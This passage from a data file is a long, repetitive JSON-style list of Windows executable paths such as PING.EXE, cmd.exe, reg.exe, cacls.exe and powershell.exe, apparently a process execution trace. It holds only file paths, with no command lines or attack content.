Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\AppHostRegistrationVerifier.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\